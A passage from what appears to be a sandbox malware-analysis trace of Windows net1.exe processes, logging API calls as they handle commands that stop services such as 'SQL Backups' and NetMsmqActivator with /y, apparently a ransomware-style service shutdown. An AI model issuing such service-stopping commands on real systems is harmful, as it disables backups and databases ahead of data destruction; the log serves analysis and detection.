(_String1="NET stop “SQL", _String2="NET START CLI", _MaxCount=0xd) returned 14 [0124.410] LocalFree (hMem=0x793de0) returned 0x0 [0124.410] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x14 [0124.410] _wcsnicmp (_String1="NET stop “SQL", _String2="NET START EVE", _MaxCount=0xd) returned 14 [0124.410] LocalFree (hMem=0x793de0) returned 0x0 [0124.410] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x15 [0124.410] _wcsnicmp (_String1="NET stop “SQL", _String2="NET START MES", _MaxCount=0xd) returned 14 [0124.410] LocalFree (hMem=0x793de0) returned 0x0 [0124.410] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x15 [0124.410] _wcsnicmp (_String1="NET stop “SQL", _String2="NET START NET", _MaxCount=0xd) returned 14 [0124.410] LocalFree (hMem=0x793de0) returned 0x0 [0124.410] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x16 [0124.410] _wcsnicmp (_String1="NET stop “SQL", _String2="NET START RPC", _MaxCount=0xd) returned 14 [0124.410] LocalFree (hMem=0x793de0) returned 0x0 [0124.410] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x11 [0124.410] _wcsnicmp (_String1="NET stop “SQL", _String2="NET START RPC", _MaxCount=0xd) returned 14 [0124.410] LocalFree (hMem=0x793de0) returned 0x0 [0124.410] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x14 [0124.410] _wcsnicmp (_String1="NET stop “SQL", _String2="NET START SCH", _MaxCount=0xd) returned 14 [0124.410] LocalFree (hMem=0x793de0) returned 0x0 [0124.410] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x12 [0124.410] _wcsnicmp (_String1="NET stop “SQL", _String2="NET START SER", _MaxCount=0xd) returned 14 [0124.410] LocalFree (hMem=0x793de0) returned 0x0 [0124.410] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0xf [0124.410] _wcsnicmp (_String1="NET stop “SQL", _String2="NET START UPS", _MaxCount=0xd) returned 14 [0124.410] LocalFree (hMem=0x793de0) returned 0x0 [0124.410] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x17 [0124.410] _wcsnicmp (_String1="NET stop “SQL", _String2="NET START WOR", _MaxCount=0xd) returned 14 [0124.410] LocalFree (hMem=0x793de0) returned 0x0 [0124.410] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x18 [0124.410] _wcsnicmp (_String1="NET stop “SQL", _String2="NET START\r\n[s", _MaxCount=0xd) returned 14 [0124.410] LocalFree (hMem=0x793de0) returned 0x0 [0124.410] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x2a [0124.411] _wcsnicmp (_String1="NET stop “SQL", _String2="NET STATISTIC", _MaxCount=0xd) returned 14 [0124.411] LocalFree (hMem=0x793de0) returned 0x0 [0124.411] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x15 [0124.411] _wcsnicmp (_String1="NET stop “SQL", _String2="NET STOP\r\nser", _MaxCount=0xd) returned 19 [0124.411] LocalFree (hMem=0x793de0) returned 0x0 [0124.411] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1㷠y1") returned 0x58 [0124.411] _wcsnicmp (_String1="NET stop “SQL", _String2="NET TIME\r\n\r\n[", _MaxCount=0xd) returned -1 [0124.411] LocalFree (hMem=0x7956d0) returned 0x0 [0124.411] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1囐y1") returned 0x184 [0124.411] _wcsnicmp (_String1="NET stop “SQL", _String2="NET USE\r\n[dev", _MaxCount=0xd) returned -2 [0124.411] LocalFree (hMem=0x7956d0) returned 0x0 [0124.411] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1囐y1") returned 0xc7 [0124.411] _wcsnicmp (_String1="NET stop “SQL", _String2="NET USER\r\n[us", _MaxCount=0xd) returned -2 [0124.411] LocalFree (hMem=0x7956d0) returned 0x0 [0124.411] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1囐y1") returned 0x47 [0124.411] _wcsnicmp (_String1="NET stop “SQL", _String2="NET VIEW\r\n[\\\\", _MaxCount=0xd) returned -3 [0124.411] LocalFree (hMem=0x7956d0) returned 0x0 [0124.411] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1囐y1") returned 0xc2 [0124.411] _wcsnicmp (_String1="NET stop “SQL", _String2="NET\r\n [ AC", _MaxCount=0xd) returned 19 [0124.411] LocalFree (hMem=0x7956d0) returned 0x0 [0124.411] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1囐y1") returned 0x319 [0124.411] _wcsnicmp (_String1="NET stop “SQL", _String2="SERVICES\r\nNET", _MaxCount=0xd) returned -5 [0124.411] LocalFree (hMem=0x7956d0) returned 0x0 [0124.411] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1囐y1") returned 0x483 [0124.411] _wcsnicmp (_String1="NET stop “SQL", _String2="SYNTAX\r\nThe f", _MaxCount=0xd) returned -5 [0124.411] LocalFree (hMem=0x7956d0) returned 0x0 [0124.411] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1囐y1") returned 0xa86 [0124.411] _wcsnicmp (_String1="NET stop “SQL", _String2="NAMES\r\nThe fo", _MaxCount=0xd) returned 4 [0124.411] LocalFree (hMem=0x7956d0) returned 0x0 [0124.411] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1囐y1") returned 0x54 [0124.411] _wcsnicmp (_String1="NET stop “SQL", _String2="\r\nFor more in", _MaxCount=0xd) returned 97 [0124.411] LocalFree (hMem=0x7956d0) returned 0x0 [0124.411] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1囐y1") returned 0xad [0124.411] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0124.411] LocalFree (hMem=0x7956d0) returned 0x0 [0124.412] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1囐y1") returned 0x2e [0124.412] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0124.412] LocalFree (hMem=0x793de0) returned 0x0 [0124.412] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1㷠y1") returned 0x7d [0124.412] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0124.412] LocalFree (hMem=0x7956d0) returned 0x0 [0124.412] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1囐y1") returned 0x26 [0124.412] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0124.412] LocalFree (hMem=0x793de0) returned 0x0 [0124.412] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x19 [0124.412] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0124.412] LocalFree (hMem=0x793de0) returned 0x0 [0124.412] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x1b [0124.412] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0124.412] LocalFree (hMem=0x793de0) returned 0x0 [0124.412] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1㷠y1") returned 0xbe [0124.412] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0124.412] LocalFree (hMem=0x7956d0) returned 0x0 [0124.412] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1囐y1") returned 0x33 [0124.412] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0124.412] LocalFree (hMem=0x793de0) returned 0x0 [0124.412] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x19 [0124.412] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0124.412] LocalFree (hMem=0x793de0) returned 0x0 [0124.412] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1㷠y1") returned 0xc1 [0124.412] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0124.412] LocalFree (hMem=0x7956d0) returned 0x0 [0124.412] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1囐y1") returned 0x16 [0124.412] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0124.412] LocalFree (hMem=0x793de0) returned 0x0 [0124.412] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x33 [0124.412] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0124.412] LocalFree (hMem=0x793de0) returned 0x0 [0124.412] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1㷠y1") returned 0x234 [0124.412] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0124.413] LocalFree (hMem=0x7956d0) returned 0x0 [0124.413] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1囐y1") returned 0x13 [0124.413] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0124.413] LocalFree (hMem=0x793de0) returned 0x0 [0124.413] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x14 [0124.413] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0124.413] LocalFree (hMem=0x793de0) returned 0x0 [0124.413] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x14 [0124.413] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0124.413] LocalFree (hMem=0x793de0) returned 0x0 [0124.413] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x15 [0124.413] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0124.413] LocalFree (hMem=0x793de0) returned 0x0 [0124.413] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x15 [0124.413] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0124.413] LocalFree (hMem=0x793de0) returned 0x0 [0124.413] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x16 [0124.413] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0124.413] LocalFree (hMem=0x793de0) returned 0x0 [0124.413] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x11 [0124.413] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0124.413] LocalFree (hMem=0x793de0) returned 0x0 [0124.413] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x14 [0124.413] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0124.413] LocalFree (hMem=0x793de0) returned 0x0 [0124.413] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x12 [0124.413] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0124.413] LocalFree (hMem=0x793de0) returned 0x0 [0124.413] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0xf [0124.413] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0124.413] LocalFree (hMem=0x793de0) returned 0x0 [0124.413] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x17 [0124.413] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0124.414] LocalFree (hMem=0x793de0) returned 0x0 [0124.414] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x18 [0124.414] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0124.414] LocalFree (hMem=0x793de0) returned 0x0 [0124.414] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x2a [0124.414] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0124.414] LocalFree (hMem=0x793de0) returned 0x0 [0124.414] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x15 [0124.414] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0124.414] GetFileType (hFile=0x0) returned 0x0 [0124.414] GetConsoleOutputCP () returned 0x1b5 [0124.414] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0124.414] malloc (_Size=0x16) returned 0x452690 [0124.414] GetConsoleOutputCP () returned 0x1b5 [0124.414] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x452690, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0124.414] WriteFile (in: hFile=0x0, lpBuffer=0x452690, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x31f74c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f74c, lpOverlapped=0x0) returned 0 [0124.414] free (_Block=0x452690) [0124.414] LocalFree (hMem=0x793de0) returned 0x0 [0124.415] NetApiBufferFree (Buffer=0x791ae8) returned 0x0 [0124.415] NetApiBufferFree (Buffer=0x791b00) returned 0x0 [0124.415] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop “SQL Backups /y" [0124.415] exit (_Code=1) Process: id = "271" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4e5f1000" os_pid = "0x117c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "98" os_parent_pid = "0xfb8" cmd_line = "C:\\Windows\\system32\\net1 stop NetMsmqActivator /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 669 os_tid = 0xe6c [0123.695] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x35fe64 | out: lpSystemTimeAsFileTime=0x35fe64*(dwLowDateTime=0x1d77fc10, dwHighDateTime=0x1d6f0d1)) [0123.695] GetCurrentProcessId () returned 0x117c [0123.696] GetCurrentThreadId () returned 0xe6c [0123.696] GetTickCount () returned 0x11522dd [0123.696] QueryPerformanceCounter (in: lpPerformanceCount=0x35fe5c | out: lpPerformanceCount=0x35fe5c*=24279643750) returned 1 [0123.696] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0123.696] __set_app_type (_Type=0x1) [0123.696] __p__fmode () returned 0x770331f4 [0123.696] __p__commode () returned 0x770331fc [0123.696] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0123.696] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0123.696] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0123.696] GetConsoleOutputCP () returned 0x1b5 [0123.697] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0123.697] SetThreadUILanguage (LangId=0x0) returned 0x409 [0123.700] sprintf_s (in: _DstBuf=0x35fe1c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0123.700] setlocale (category=0, locale=".437") returned="English_United States.437" [0123.702] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3f8 [0123.702] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0123.702] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop NetMsmqActivator /y" [0123.702] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x35fbe8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0123.702] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x74) returned 0x41f658 [0123.702] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0123.702] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fdec | out: Buffer=0x35fdec*=0x421af8) returned 0x0 [0123.702] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fdec | out: Buffer=0x35fdec*=0x421b10) returned 0x0 [0123.702] _fileno (_File=0x77032900) returned -2 [0123.702] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0123.703] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0123.703] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0123.703] _wcsicmp (_String1="config", _String2="stop") returned -16 [0123.703] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0123.703] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0123.703] _wcsicmp (_String1="file", _String2="stop") returned -13 [0123.703] _wcsicmp (_String1="files", _String2="stop") returned -13 [0123.703] _wcsicmp (_String1="group", _String2="stop") returned -12 [0123.703] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0123.703] _wcsicmp (_String1="help", _String2="stop") returned -11 [0123.703] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0123.703] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0123.703] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0123.703] _wcsicmp (_String1="session", _String2="stop") returned -15 [0123.703] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0123.703] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0123.703] _wcsicmp (_String1="share", _String2="stop") returned -12 [0123.703] _wcsicmp (_String1="start", _String2="stop") returned -14 [0123.703] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0123.703] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0123.703] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0123.703] _wcsicmp (_String1="accounts", _String2="NetMsmqActivator") returned -13 [0123.703] _wcsicmp (_String1="computer", _String2="NetMsmqActivator") returned -11 [0123.703] _wcsicmp (_String1="config", _String2="NetMsmqActivator") returned -11 [0123.703] _wcsicmp (_String1="continue", _String2="NetMsmqActivator") returned -11 [0123.703] _wcsicmp (_String1="cont", _String2="NetMsmqActivator") returned -11 [0123.703] _wcsicmp (_String1="file", _String2="NetMsmqActivator") returned -8 [0123.703] _wcsicmp (_String1="files", _String2="NetMsmqActivator") returned -8 [0123.703] _wcsicmp (_String1="group", _String2="NetMsmqActivator") returned -7 [0123.703] _wcsicmp (_String1="groups", _String2="NetMsmqActivator") returned -7 [0123.703] _wcsicmp (_String1="help", _String2="NetMsmqActivator") returned -6 [0123.703] _wcsicmp (_String1="helpmsg", _String2="NetMsmqActivator") returned -6 [0123.703] _wcsicmp (_String1="localgroup", _String2="NetMsmqActivator") returned -2 [0123.703] _wcsicmp (_String1="pause", _String2="NetMsmqActivator") returned 2 [0123.703] _wcsicmp (_String1="session", _String2="NetMsmqActivator") returned 5 [0123.703] _wcsicmp (_String1="sessions", _String2="NetMsmqActivator") returned 5 [0123.704] _wcsicmp (_String1="sess", _String2="NetMsmqActivator") returned 5 [0123.704] _wcsicmp (_String1="share", _String2="NetMsmqActivator") returned 5 [0123.704] _wcsicmp (_String1="start", _String2="NetMsmqActivator") returned 5 [0123.704] _wcsicmp (_String1="stats", _String2="NetMsmqActivator") returned 5 [0123.704] _wcsicmp (_String1="statistics", _String2="NetMsmqActivator") returned 5 [0123.704] _wcsicmp (_String1="stop", _String2="NetMsmqActivator") returned 5 [0123.704] _wcsicmp (_String1="time", _String2="NetMsmqActivator") returned 6 [0123.704] _wcsicmp (_String1="user", _String2="NetMsmqActivator") returned 7 [0123.704] _wcsicmp (_String1="users", _String2="NetMsmqActivator") returned 7 [0123.704] _wcsicmp (_String1="msg", _String2="NetMsmqActivator") returned -1 [0123.704] _wcsicmp (_String1="messenger", _String2="NetMsmqActivator") returned -1 [0123.704] _wcsicmp (_String1="receiver", _String2="NetMsmqActivator") returned 4 [0123.704] _wcsicmp (_String1="rcv", _String2="NetMsmqActivator") returned 4 [0123.704] _wcsicmp (_String1="netpopup", _String2="NetMsmqActivator") returned 3 [0123.704] _wcsicmp (_String1="redirector", _String2="NetMsmqActivator") returned 4 [0123.704] _wcsicmp (_String1="redir", _String2="NetMsmqActivator") returned 4 [0123.704] _wcsicmp (_String1="rdr", _String2="NetMsmqActivator") returned 4 [0123.704] _wcsicmp (_String1="workstation", _String2="NetMsmqActivator") returned 9 [0123.704] _wcsicmp (_String1="work", _String2="NetMsmqActivator") returned 9 [0123.704] _wcsicmp (_String1="wksta", _String2="NetMsmqActivator") returned 9 [0123.704] _wcsicmp (_String1="prdr", _String2="NetMsmqActivator") returned 2 [0123.704] _wcsicmp (_String1="devrdr", _String2="NetMsmqActivator") returned -10 [0123.704] _wcsicmp (_String1="lanmanworkstation", _String2="NetMsmqActivator") returned -2 [0123.704] _wcsicmp (_String1="server", _String2="NetMsmqActivator") returned 5 [0123.704] 